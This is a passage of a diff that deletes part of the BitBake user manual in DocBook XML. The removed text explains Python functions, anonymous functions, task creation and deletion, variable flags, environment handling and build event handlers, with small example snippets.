-                after all overrides have been applied.
-            </para>
-        </section>
-
-        <section id='bitbake-style-python-functions'>
-            <title>BitBake-Style Python Functions</title>
-
-            <para>
-                These functions are written in Python and executed by
-                BitBake or other Python functions using
-                <filename>bb.build.exec_func()</filename>.
-            </para>
-
-            <para>
-                An example BitBake function is:
-                <literallayout class='monospaced'>
-     python some_python_function () {
-         d.setVar("TEXT", "Hello World")
-         print d.getVar("TEXT")
-     }
-                </literallayout>
-                Because the Python "bb" and "os" modules are already
-                imported, you do not need to import these modules.
-                Also in these types of functions, the datastore ("d")
-                is a global variable and is always automatically
-                available.
-                <note>
-                    Variable expressions (e.g. <filename>${X}</filename>)
-                    are no longer expanded within Python functions.
-                    This behavior is intentional in order to allow you
-                    to freely set variable values to expandable expressions
-                    without having them expanded prematurely.
-                    If you do wish to expand a variable within a Python
-                    function, use <filename>d.getVar("X")</filename>.
-                    Or, for more complicated expressions, use
-                    <filename>d.expand()</filename>.
-                </note>
-            </para>
-
-            <para>
-                Similar to shell functions, you can also apply overrides
-                and override-style operators to BitBake-style Python
-                functions.
-            </para>
-
-            <para>
-                As an example, consider the following:
-                <literallayout class='monospaced'>
-     python do_foo_prepend() {
-         bb.plain("first")
-     }
-
-     python do_foo() {
-         bb.plain("second")
-     }
-
-     python do_foo_append() {
-         bb.plain("third")
-     }
-                </literallayout>
-                Running <filename>do_foo</filename> prints
-                the following:
-                <literallayout class='monospaced'>
-     recipename do_foo: first
-     recipename do_foo: second
-     recipename do_foo: third
-                </literallayout>
-                You can use the <filename>bitbake -e</filename>&nbsp;<replaceable>recipename</replaceable>
-                command to view the final assembled function
-                after all overrides have been applied.
-            </para>
-        </section>
-
-        <section id='python-functions'>
-            <title>Python Functions</title>
-
-            <para>
-                These functions are written in Python and are executed by
-                other Python code.
-                Examples of Python functions are utility functions
-                that you intend to call from in-line Python or
-                from within other Python functions.
-                Here is an example:
-                <literallayout class='monospaced'>
-     def get_depends(d):
-         if d.getVar('SOMECONDITION'):
-             return "dependencywithcond"
-         else:
-             return "dependency"
-     SOMECONDITION = "1"
-     DEPENDS = "${@get_depends(d)}"
-                </literallayout>
-                This would result in <filename>DEPENDS</filename>
-                containing <filename>dependencywithcond</filename>.
-            </para>
-
-            <para>
-                Here are some things to know about Python functions:
-                <itemizedlist>
-                    <listitem><para>Python functions can take parameters.
-                        </para></listitem>
-                    <listitem><para>The BitBake datastore is not
-                        automatically available.
-                        Consequently, you must pass it in as a
-                        parameter to the function.
-                        </para></listitem>
-                    <listitem><para>The "bb" and "os" Python modules are
-                        automatically available.
-                        You do not need to import them.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='bitbake-style-python-functions-versus-python-functions'>
-            <title>BitBake-Style Python Functions Versus Python Functions</title>
-
-            <para>
-                Following are some important differences between
-                BitBake-style Python functions and regular Python
-                functions defined with "def":
-                <itemizedlist>
-                    <listitem><para>
-                        Only BitBake-style Python functions can be
-                        <link linkend='tasks'>tasks</link>.
-                        </para></listitem>
-                    <listitem><para>
-                        Overrides and override-style operators can only
-                        be applied to BitBake-style Python functions.
-                        </para></listitem>
-                    <listitem><para>
-                        Only regular Python functions can take arguments
-                        and return values.
-                        </para></listitem>
-                    <listitem><para>
-                        <link linkend='variable-flags'>Variable flags</link>
-                        such as <filename>[dirs]</filename>,
-                        <filename>[cleandirs]</filename>, and
-                        <filename>[lockfiles]</filename> can be used
-                        on BitBake-style Python functions, but not on
-                        regular Python functions.
-                        </para></listitem>
-                    <listitem><para>
-                        BitBake-style Python functions generate a separate
-                        <filename>${</filename><link linkend='var-bb-T'><filename>T</filename></link><filename>}/run.</filename><replaceable>function-name</replaceable><filename>.</filename><replaceable>pid</replaceable>
-                        script that is executed to run the function, and also
-                        generate a log file in
-                        <filename>${T}/log.</filename><replaceable>function-name</replaceable><filename>.</filename><replaceable>pid</replaceable>
-                        if they are executed as tasks.</para>
-
-                        <para>
-                        Regular Python functions execute "inline" and do not
-                        generate any files in <filename>${T}</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        Regular Python functions are called with the usual
-                        Python syntax.
-                        BitBake-style Python functions are usually tasks and
-                        are called directly by BitBake, but can also be called
-                        manually from Python code by using the
-                        <filename>bb.build.exec_func()</filename> function.
-                        Here is an example:
-                        <literallayout class='monospaced'>
-     bb.build.exec_func("my_bitbake_style_function", d)
-                        </literallayout>
-                        <note>
-                            <filename>bb.build.exec_func()</filename> can also
-                            be used to run shell functions from Python code.
-                            If you want to run a shell function before a Python
-                            function within the same task, then you can use a
-                            parent helper Python function that starts by running
-                            the shell function with
-                            <filename>bb.build.exec_func()</filename> and then
-                            runs the Python code.
-                        </note></para>
-
-                        <para>To detect errors from functions executed with
-                        <filename>bb.build.exec_func()</filename>, you
-                        can catch the <filename>bb.build.FuncFailed</filename>
-                        exception.
-                        <note>
-                            Functions in metadata (recipes and classes) should
-                            not themselves raise
-                            <filename>bb.build.FuncFailed</filename>.
-                            Rather, <filename>bb.build.FuncFailed</filename>
-                            should be viewed as a general indicator that the
-                            called function failed by raising an exception.
-                            For example, an exception raised by
-                            <filename>bb.fatal()</filename> will be caught inside
-                            <filename>bb.build.exec_func()</filename>, and a
-                            <filename>bb.build.FuncFailed</filename> will be raised
-                            in response.
-                        </note>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Due to their simplicity, you should prefer regular Python functions
-                over BitBake-style Python functions unless you need a feature specific
-                to BitBake-style Python functions.
-                Regular Python functions in metadata are a more recent invention than
-                BitBake-style Python functions, and older code tends to use
-                <filename>bb.build.exec_func()</filename> more often.
-            </para>
-        </section>
-
-        <section id='anonymous-python-functions'>
-            <title>Anonymous Python Functions</title>
-
-            <para>
-                Sometimes it is useful to set variables or perform
-                other operations programmatically during parsing.
-                To do this, you can define special Python functions,
-                called anonymous Python functions, that run at the
-                end of parsing.
-                For example, the following conditionally sets a variable
-                based on the value of  another variable:
-                <literallayout class='monospaced'>
-     python () {
-         if d.getVar('SOMEVAR') == 'value':
-             d.setVar('ANOTHERVAR', 'value2')
-     }
-                </literallayout>
-                An equivalent way to mark a function as an anonymous
-                function is to give it the name "__anonymous", rather
-                than no name.
-            </para>
-
-            <para>
-                Anonymous Python functions always run at the end
-                of parsing, regardless of where they are defined.
-                If a recipe contains many anonymous functions, they
-                run in the same order as they are defined within the
-                recipe.
-                As an example, consider the following snippet:
-                <literallayout class='monospaced'>
-     python () {
-         d.setVar('FOO', 'foo 2')
-     }
-
-     FOO = "foo 1"
-
-     python () {
-         d.appendVar('BAR', ' bar 2')
-     }
-
-     BAR = "bar 1"
-                </literallayout>
-                The previous example is conceptually equivalent to the
-                following snippet:
-                <literallayout class='monospaced'>
-     FOO = "foo 1"
-     BAR = "bar 1"
-     FOO = "foo 2"
-     BAR += "bar 2"
-                </literallayout>
-                <filename>FOO</filename> ends up with the value "foo 2",
-                and <filename>BAR</filename> with the value "bar 1 bar 2".
-                Just as in the second snippet, the values set for the
-                variables within the anonymous functions become available
-                to tasks, which always run after parsing.
-            </para>
-
-            <para>
-                Overrides and override-style operators such as
-                "<filename>_append</filename>" are applied before
-                anonymous functions run.
-                In the following example, <filename>FOO</filename> ends
-                up with the value "foo from anonymous":
-                <literallayout class='monospaced'>
-     FOO = "foo"
-     FOO_append = " from outside"
-
-     python () {
-         d.setVar("FOO", "foo from anonymous")
-     }
-                </literallayout>
-                For methods you can use with anonymous Python functions,
-                see the
-                "<link linkend='functions-you-can-call-from-within-python'>Functions You Can Call From Within Python</link>"
-                section.
-                For a different method to run Python code during parsing,
-                see the
-                "<link linkend='inline-python-variable-expansion'>Inline Python Variable Expansion</link>"
-                section.
-            </para>
-        </section>
-
-        <section id='flexible-inheritance-for-class-functions'>
-            <title>Flexible Inheritance for Class Functions</title>
-
-            <para>
-                Through coding techniques and the use of
-                <filename>EXPORT_FUNCTIONS</filename>, BitBake supports
-                exporting a function from a class such that the
-                class function appears as the default implementation
-                of the function, but can still be called if a recipe
-                inheriting the class needs to define its own version of
-                the function.
-            </para>
-
-            <para>
-                To understand the benefits of this feature, consider
-                the basic scenario where a class defines a task function
-                and your recipe inherits the class.
-                In this basic scenario, your recipe inherits the task
-                function as defined in the class.
-                If desired, your recipe can add to the start and end of the
-                function by using the "_prepend" or "_append" operations
-                respectively, or it can redefine the function completely.
-                However, if it redefines the function, there is
-                no means  for it to call the class version of the function.
-                <filename>EXPORT_FUNCTIONS</filename> provides a mechanism
-                that enables the recipe's version of the function to call
-                the original version of the function.
-            </para>
-
-            <para>
-                To make use of this technique, you need the following
-                things in place:
-                <itemizedlist>
-                    <listitem><para>
-                        The class needs to define the function as follows:
-                        <literallayout class='monospaced'>
-     <replaceable>classname</replaceable><filename>_</filename><replaceable>functionname</replaceable>
-                        </literallayout>
-                        For example, if you have a class file
-                        <filename>bar.bbclass</filename> and a function named
-                        <filename>do_foo</filename>, the class must define the function
-                        as follows:
-                        <literallayout class='monospaced'>
-     bar_do_foo
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        The class needs to contain the <filename>EXPORT_FUNCTIONS</filename>
-                        statement as follows:
-                        <literallayout class='monospaced'>
-     EXPORT_FUNCTIONS <replaceable>functionname</replaceable>
-                        </literallayout>
-                        For example, continuing with the same example, the
-                        statement in the <filename>bar.bbclass</filename> would be
-                        as follows:
-                        <literallayout class='monospaced'>
-     EXPORT_FUNCTIONS do_foo
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        You need to call the function appropriately from within your
-                        recipe.
-                        Continuing with the same example, if your recipe
-                        needs to call the class version of the function,
-                        it should call <filename>bar_do_foo</filename>.
-                        Assuming <filename>do_foo</filename> was a shell function
-                        and <filename>EXPORT_FUNCTIONS</filename> was used as above,
-                        the recipe's function could conditionally call the
-                        class version of the function as follows:
-                        <literallayout class='monospaced'>
-     do_foo() {
-             if [ somecondition ] ; then
-                     bar_do_foo
-             else
-                     # Do something else
-             fi
-     }
-                        </literallayout>
-                        To call your modified version of the function as defined
-                        in your recipe, call it as <filename>do_foo</filename>.
-                        </para></listitem>
-                </itemizedlist>
-                With these conditions met, your single recipe
-                can freely choose between the original function
-                as defined in the class file and the modified function in your recipe.
-                If you do not set up these conditions, you are limited to using one function
-                or the other.
-            </para>
-        </section>
-    </section>
-
-    <section id='tasks'>
-        <title>Tasks</title>
-
-        <para>
-            Tasks are BitBake execution units that make up the
-            steps that BitBake can run for a given recipe.
-            Tasks are only supported in recipes and classes
-            (i.e. in <filename>.bb</filename> files and files
-            included or inherited from <filename>.bb</filename>
-            files).
-            By convention, tasks have names that start with "do_".
-        </para>
-
-        <section id='promoting-a-function-to-a-task'>
-            <title>Promoting a Function to a Task</title>
-
-            <para>
-                Tasks are either
-                <link linkend='shell-functions'>shell functions</link> or
-                <link linkend='bitbake-style-python-functions'>BitBake-style Python functions</link>
-                that have been promoted to tasks by using the
-                <filename>addtask</filename> command.
-                The <filename>addtask</filename> command can also
-                optionally describe dependencies between the
-                task and other tasks.
-                Here is an example that shows how to define a task
-                and declare some dependencies:
-                <literallayout class='monospaced'>
-     python do_printdate () {
-         import time
-         print time.strftime('%Y%m%d', time.gmtime())
-     }
-     addtask printdate after do_fetch before do_build
-                </literallayout>
-                The first argument to <filename>addtask</filename>
-                is the name of the function to promote to
-                a task.
-                If the name does not start with "do_", "do_" is
-                implicitly added, which enforces the convention that
-                all task names start with "do_".
-            </para>
-
-            <para>
-                In the previous example, the
-                <filename>do_printdate</filename> task becomes a
-                dependency of the <filename>do_build</filename>
-                task, which is the default task (i.e. the task run by
-                the <filename>bitbake</filename> command unless
-                another task is specified explicitly).
-                Additionally, the <filename>do_printdate</filename>
-                task becomes dependent upon the
-                <filename>do_fetch</filename> task.
-                Running the <filename>do_build</filename> task
-                results in the <filename>do_printdate</filename>
-                task running first.
-                <note>
-                    If you try out the previous example, you might see that
-                    the <filename>do_printdate</filename> task is only run
-                    the first time you build the recipe with
-                    the <filename>bitbake</filename> command.
-                    This is because BitBake considers the task "up-to-date"
-                    after that initial run.
-                    If you want to force the task to always be rerun for
-                    experimentation purposes, you can make BitBake always
-                    consider the task "out-of-date" by using the
-                    <filename>[</filename><link linkend='variable-flags'><filename>nostamp</filename></link><filename>]</filename>
-                    variable flag, as follows:
-                    <literallayout class='monospaced'>
-     do_printdate[nostamp] = "1"
-                    </literallayout>
-                    You can also explicitly run the task and provide the
-                    <filename>-f</filename> option as follows:
-                    <literallayout class='monospaced'>
-     $ bitbake <replaceable>recipe</replaceable> -c printdate -f
-                    </literallayout>
-                    When manually selecting a task to run with the
-                    <filename>bitbake</filename>&nbsp;<replaceable>recipe</replaceable>&nbsp;<filename>-c</filename>&nbsp;<replaceable>task</replaceable>
-                    command, you can omit the "do_" prefix as part of the
-                    task name.
-                </note>
-            </para>
-
-            <para>
-                You might wonder about the practical effects of using
-                <filename>addtask</filename> without specifying any
-                dependencies as is done in the following example:
-                <literallayout class='monospaced'>
-     addtask printdate
-                </literallayout>
-                In this example, assuming dependencies have not been
-                added through some other means, the only way to run
-                the task is by explicitly selecting it with
-                <filename>bitbake</filename>&nbsp;<replaceable>recipe</replaceable>&nbsp;<filename>-c printdate</filename>.
-                You can use the
-                <filename>do_listtasks</filename> task to list all tasks
-                defined in a recipe as shown in the following example:
-                <literallayout class='monospaced'>
-     $ bitbake <replaceable>recipe</replaceable> -c listtasks
-                </literallayout>
-                For more information on task dependencies, see the
-                "<link linkend='dependencies'>Dependencies</link>"
-                section.
-            </para>
-
-            <para>
-                See the
-                "<link linkend='variable-flags'>Variable Flags</link>"
-                section for information on variable flags you can use with
-                tasks.
-            </para>
-        </section>
-
-        <section id='deleting-a-task'>
-            <title>Deleting a Task</title>
-
-            <para>
-                As well as being able to add tasks, you can delete them.
-                Simply use the <filename>deltask</filename> command to
-                delete a task.
-                For example, to delete the example task used in the previous
-                sections, you would use:
-                <literallayout class='monospaced'>
-     deltask printdate
-                </literallayout>
-                If you delete a task using the <filename>deltask</filename>
-                command and the task has dependencies, the dependencies are
-                not reconnected.
-                For example, suppose you have three tasks named
-                <filename>do_a</filename>, <filename>do_b</filename>, and
-                <filename>do_c</filename>.
-                Furthermore, <filename>do_c</filename> is dependent on
-                <filename>do_b</filename>, which in turn is dependent on
-                <filename>do_a</filename>.
-                Given this scenario, if you use <filename>deltask</filename>
-                to delete <filename>do_b</filename>, the implicit dependency
-                relationship between <filename>do_c</filename> and
-                <filename>do_a</filename> through <filename>do_b</filename>
-                no longer exists, and <filename>do_c</filename> dependencies
-                are not updated to include <filename>do_a</filename>.
-                Thus, <filename>do_c</filename> is free to run before
-                <filename>do_a</filename>.
-            </para>
-
-            <para>
-                If you want dependencies such as these to remain intact, use
-                the <filename>[noexec]</filename> varflag to disable the task
-                instead of using the <filename>deltask</filename> command to
-                delete it:
-                <literallayout class='monospaced'>
-     do_b[noexec] = "1"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='passing-information-into-the-build-task-environment'>
-            <title>Passing Information Into the Build Task Environment</title>
-
-            <para>
-                When running a task, BitBake tightly controls the shell execution
-                environment of the build tasks to make
-                sure unwanted contamination from the build machine cannot
-                influence the build.
-                <note>
-                    By default, BitBake cleans the environment to include only those
-                    things exported or listed in its whitelist to ensure that the build
-                    environment is reproducible and consistent.
-                    You can prevent this "cleaning" by setting the
-                    <link linkend='var-bb-BB_PRESERVE_ENV'><filename>BB_PRESERVE_ENV</filename></link>
-                    variable.
-                </note>
-                Consequently, if you do want something to get passed into the
-                build task environment, you must take these two steps:
-                <orderedlist>
-                    <listitem><para>
-                        Tell BitBake to load what you want from the environment
-                        into the datastore.
-                        You can do so through the
-                        <link linkend='var-bb-BB_ENV_WHITELIST'><filename>BB_ENV_WHITELIST</filename></link>
-                        and
-                        <link linkend='var-bb-BB_ENV_EXTRAWHITE'><filename>BB_ENV_EXTRAWHITE</filename></link>
-                        variables.
-                        For example, assume you want to prevent the build system from
-                        accessing your <filename>$HOME/.ccache</filename>
-                        directory.
-                        The following command "whitelists" the environment variable
-                        <filename>CCACHE_DIR</filename> causing BitBake to allow that
-                        variable into the datastore:
-                        <literallayout class='monospaced'>
-     export BB_ENV_EXTRAWHITE="$BB_ENV_EXTRAWHITE CCACHE_DIR"
-                        </literallayout></para></listitem>
-                    <listitem><para>
-                        Tell BitBake to export what you have loaded into the
-                        datastore to the task environment of every running task.
-                        Loading something from the environment into the datastore
-                        (previous step) only makes it available in the datastore.
-                        To export it to the task environment of every running task,
-                        use a command similar to the following in your local configuration
-                        file <filename>local.conf</filename> or your
-                        distribution configuration file:
-                        <literallayout class='monospaced'>
-     export CCACHE_DIR
-                        </literallayout>
-                        <note>
-                            A side effect of the previous steps is that BitBake
-                            records the variable as a dependency of the build process
-                            in things like the setscene checksums.
-                            If doing so results in unnecessary rebuilds of tasks, you can
-                            whitelist the variable so that the setscene code
-                            ignores the dependency when it creates checksums.
-                        </note></para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                Sometimes, it is useful to be able to obtain information
-                from the original execution environment.
-                BitBake saves a copy of the original environment into
-                a special variable named
-                <link linkend='var-bb-BB_ORIGENV'><filename>BB_ORIGENV</filename></link>.
-            </para>
-
-            <para>
-                The <filename>BB_ORIGENV</filename> variable returns a datastore
-                object that can be queried using the standard datastore operators
-                such as <filename>getVar(, False)</filename>.
-                The datastore object is useful, for example, to find the original
-                <filename>DISPLAY</filename> variable.
-                Here is an example:
-                <literallayout class='monospaced'>
-     origenv = d.getVar("BB_ORIGENV", False)
-     bar = origenv.getVar("BAR", False)
-                </literallayout>
-                The previous example returns <filename>BAR</filename> from the original
-                execution environment.
-            </para>
-        </section>
-    </section>
-
-    <section id='variable-flags'>
-        <title>Variable Flags</title>
-
-        <para>
-            Variable flags (varflags) help control a task's functionality
-            and dependencies.
-            BitBake reads and writes varflags to the datastore using the following
-            command forms:
-            <literallayout class='monospaced'>
-     <replaceable>variable</replaceable> = d.getVarFlags("<replaceable>variable</replaceable>")
-     self.d.setVarFlags("FOO", {"func": True})
-            </literallayout>
-        </para>
-
-        <para>
-            When working with varflags, the same syntax, with the exception of
-            overrides, applies.
-            In other words, you can set, append, and prepend varflags just like
-            variables.
-            See the
-            "<link linkend='variable-flag-syntax'>Variable Flag Syntax</link>"
-            section for details.
-        </para>
-
-        <para>
-            BitBake has a defined set of varflags available for recipes and
-            classes.
-            Tasks support a number of these flags which control various
-            functionality of the task:
-            <itemizedlist>
-                <listitem><para><emphasis><filename>[cleandirs]</filename>:</emphasis>
-                    Empty directories that should be created before the
-                    task runs.
-                    Directories that already exist are removed and recreated
-                    to empty them.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[depends]</filename>:</emphasis>
-                    Controls inter-task dependencies.
-                    See the
-                    <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
-                    variable and the
-                    "<link linkend='inter-task-dependencies'>Inter-Task Dependencies</link>"
-                    section for more information.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[deptask]</filename>:</emphasis>
-                    Controls task build-time dependencies.
-                    See the
-                    <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
-                    variable and the
-                    "<link linkend='build-dependencies'>Build Dependencies</link>"
-                    section for more information.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[dirs]</filename>:</emphasis>
-                    Directories that should be created before the task runs.
-                    Directories that already exist are left as is.
-                    The last directory listed is used as the
-                    current working directory for the task.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[lockfiles]</filename>:</emphasis>
-                     Specifies one or more lockfiles to lock while the task
-                     executes.
-                     Only one task may hold a lockfile, and any task that
-                     attempts to lock an already locked file will block until
-                     the lock is released.
-                     You can use this variable flag to accomplish mutual
-                     exclusion.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[noexec]</filename>:</emphasis>
-                    When set to "1", marks the task as being empty, with
-                    no execution required.
-                    You can use the <filename>[noexec]</filename> flag to set up
-                    tasks as dependency placeholders, or to disable tasks defined
-                    elsewhere that are not needed in a particular recipe.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[nostamp]</filename>:</emphasis>
-                    When set to "1", tells BitBake to not generate a stamp
-                    file for a task, which implies the task should always
-                    be executed.
-                    <note><title>Caution</title>
-                        Any task that depends (possibly indirectly) on a
-                        <filename>[nostamp]</filename> task will always be
-                        executed as well.
-                        This can cause unnecessary rebuilding if you are
-                        not careful.
-                    </note>
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[number_threads]</filename>:</emphasis>
-                    Limits tasks to a specific number of simultaneous threads
-                    during execution.
-                    This varflag is useful when your build host has a large number
-                    of cores but certain tasks need to be rate-limited due to various
-                    kinds of resource constraints (e.g. to avoid network throttling).
-                    <filename>number_threads</filename> works similarly to the
-                    <link linkend='var-bb-BB_NUMBER_THREADS'><filename>BB_NUMBER_THREADS</filename></link>
-                    variable but is task-specific.</para>
-
-                    <para>Set the value globally.
-                    For example, the following makes sure the
-                    <filename>do_fetch</filename> task uses no more than two
-                    simultaneous execution threads:
-                    <literallayout class='monospaced'>
-     do_fetch[number_threads] = "2"
-                    </literallayout>
-                    <note><title>Warnings</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                Setting the varflag in individual recipes rather
-                                than globally can result in unpredictable behavior.
-                                </para></listitem>
-                            <listitem><para>
-                                Setting the varflag to a value greater than the
-                                value used in the <filename>BB_NUMBER_THREADS</filename>
-                                variable causes <filename>number_threads</filename>
-                                to have no effect.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[postfuncs]</filename>:</emphasis>
-                    List of functions to call after the completion of the task.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[prefuncs]</filename>:</emphasis>
-                    List of functions to call before the task executes.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[rdepends]</filename>:</emphasis>
-                    Controls inter-task runtime dependencies.
-                    See the
-                    <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variable, the
-                    <link linkend='var-bb-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                    variable, and the
-                    "<link linkend='inter-task-dependencies'>Inter-Task Dependencies</link>"
-                    section for more information.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[rdeptask]</filename>:</emphasis>
-                    Controls task runtime dependencies.
-                    See the
-                    <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variable, the
-                    <link linkend='var-bb-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                    variable, and the
-                    "<link linkend='runtime-dependencies'>Runtime Dependencies</link>"
-                    section for more information.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[recideptask]</filename>:</emphasis>
-                    When set in conjunction with
-                    <filename>recrdeptask</filename>, specifies a task that
-                    should be inspected for additional dependencies.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[recrdeptask]</filename>:</emphasis>
-                    Controls task recursive runtime dependencies.
-                    See the
-                    <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variable, the
-                    <link linkend='var-bb-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                    variable, and the
-                    "<link linkend='recursive-dependencies'>Recursive Dependencies</link>"
-                    section for more information.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[stamp-extra-info]</filename>:</emphasis>
-                    Extra stamp information to append to the task's stamp.
-                    As an example, OpenEmbedded uses this flag to allow
-                    machine-specific tasks.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[umask]</filename>:</emphasis>
-                    The umask to run the task under.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            Several varflags are useful for controlling how signatures are
-            calculated for variables.
-            For more information on this process, see the
-            "<link linkend='checksums'>Checksums (Signatures)</link>"
-            section.
-            <itemizedlist>
-                <listitem><para><emphasis><filename>[vardeps]</filename>:</emphasis>
-                    Specifies a space-separated list of additional
-                    variables to add to a variable's dependencies
-                    for the purposes of calculating its signature.
-                    Adding variables to this list is useful, for example, when
-                    a function refers to a variable in a manner that
-                    does not allow BitBake to automatically determine
-                    that the variable is referred to.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[vardepsexclude]</filename>:</emphasis>
-                    Specifies a space-separated list of variables
-                    that should be excluded from a variable's dependencies
-                    for the purposes of calculating its signature.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[vardepvalue]</filename>:</emphasis>
-                    If set, instructs BitBake to ignore the actual
-                    value of the variable and instead use the specified
-                    value when calculating the variable's signature.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>[vardepvalueexclude]</filename>:</emphasis>
-                    Specifies a pipe-separated list of strings to exclude
-                    from the variable's value when calculating the
-                    variable's signature.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='events'>
-        <title>Events</title>
-
-        <para>
-            BitBake allows installation of event handlers within recipe
-            and class files.
-            Events are triggered at certain points during operation, such
-            as the beginning of operation against a given recipe
-            (i.e. <filename>*.bb</filename>), the start of a given task,
-            a task failure, a task success, and so forth.
-            The intent is to make it easy to do things like email
-            notification on build failures.
-        </para>
-
-        <para>
-            Following is an example event handler that prints the name
-            of the event and the content of the
-            <filename>FILE</filename> variable:
-            <literallayout class='monospaced'>
-     addhandler myclass_eventhandler
-     python myclass_eventhandler() {
-         from bb.event import getName
-         print("The name of the Event is %s" % getName(e))
-         print("The file we run for is %s" % d.getVar('FILE'))
-     }
-     myclass_eventhandler[eventmask] = "bb.event.BuildStarted bb.event.BuildCompleted"
-            </literallayout>
-            In the previous example, an eventmask has been set so that
-            the handler only sees the "BuildStarted" and "BuildCompleted"
-            events.
-            This event handler gets called every time an event matching
-            the eventmask is triggered.
-            A global variable "e" is defined, which represents the current
-            event.
-            With the <filename>getName(e)</filename> method, you can get
-            the name of the triggered event.
-            The global datastore is available as "d".
-            In legacy code, you might see "e.data" used to get the datastore.
-            However, realize that "e.data" is deprecated and you should use
-            "d" going forward.
-        </para>
-
-        <para>
-            The context of the datastore is appropriate to the event
-            in question.
-            For example, "BuildStarted" and "BuildCompleted" events run
-            before any tasks are executed so would be in the global
-            configuration datastore namespace.
-            No recipe-specific metadata exists in that namespace.
-            The "BuildStarted" and "BuildCompleted" events also run in
-            the main cooker/server process rather than any worker context.
-            Thus, any changes made to the datastore would be seen by other
-            cooker/server events within the current build but not seen
-            outside of that build or in any worker context.
-            Task events run in the actual tasks in question consequently
-            have recipe-specific and task-specific contents.
-            These events run in the worker context and are discarded at
-            the end of task execution.
-        </para>
-
-        <para>
-            During a standard build, the following common events might
-            occur.
-            The following events are the most common kinds of events that
-            most metadata might have an interest in viewing:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>bb.event.ConfigParsed()</filename>:
-                    Fired when the base configuration; which consists of
-                    <filename>bitbake.conf</filename>,
-                    <filename>base.bbclass</filename> and any global
-                    <filename>INHERIT</filename> statements; has been parsed.
-                    You can see multiple such events when each of the
-                    workers parse the base configuration or if the server
-                    changes configuration and reparses.
-                    Any given datastore only has one such event executed
-                    against it, however.
-                    If
-                    <link linkende='var-bb-BB_INVALIDCONF'><filename>BB_INVALIDCONF</filename></link>
-                    is set in the datastore by the event handler, the
-                    configuration is reparsed and a new event triggered,
-                    allowing the metadata to update configuration.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.HeartbeatEvent()</filename>:
-                    Fires at regular time intervals of one second.
-                    You can configure the interval time using the
-                    <filename>BB_HEARTBEAT_EVENT</filename> variable.
-                    The event's "time" attribute is the
-                    <filename>time.time()</filename> value when the
-                    event is triggered.
-                    This event is useful for activities such as
-                    system state monitoring.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.ParseStarted()</filename>:
-                    Fired when BitBake is about to start parsing recipes.
-                    This event's "total" attribute represents the number of
-                    recipes BitBake plans to parse.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.ParseProgress()</filename>:
-                    Fired as parsing progresses.
-                    This event's "current" attribute is the number of
-                    recipes parsed as well as the "total" attribute.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.ParseCompleted()</filename>:
-                    Fired when parsing is complete.
-                    This event's "cached", "parsed", "skipped", "virtuals",
-                    "masked", and "errors" attributes provide statistics
-                    for the parsing results.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.BuildStarted()</filename>:
-                    Fired when a new build starts.
-                    BitBake fires multiple "BuildStarted" events (one per configuration)
-                    when multiple configuration (multiconfig) is enabled.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.build.TaskStarted()</filename>:
-                    Fired when a task starts.
-                    This event's "taskfile" attribute points to the recipe
-                    from which the task originates.
-                    The "taskname" attribute, which is the task's name,
-                    includes the <filename>do_</filename> prefix, and the
-                    "logfile" attribute point to where the task's output is
-                    stored.
-                    Finally, the "time" attribute is the task's execution start
-                    time.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.build.TaskInvalid()</filename>:
-                    Fired if BitBake tries to execute a task that does not exist.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.build.TaskFailedSilent()</filename>:
-                    Fired for setscene tasks that fail and should not be
-                    presented to the user verbosely.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.build.TaskFailed()</filename>:
-                    Fired for normal tasks that fail.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.build.TaskSucceeded()</filename>:
-                    Fired when a task successfully completes.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.BuildCompleted()</filename>:
-                    Fired when a build finishes.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.cooker.CookerExit()</filename>:
-                    Fired when the BitBake server/cooker shuts down.
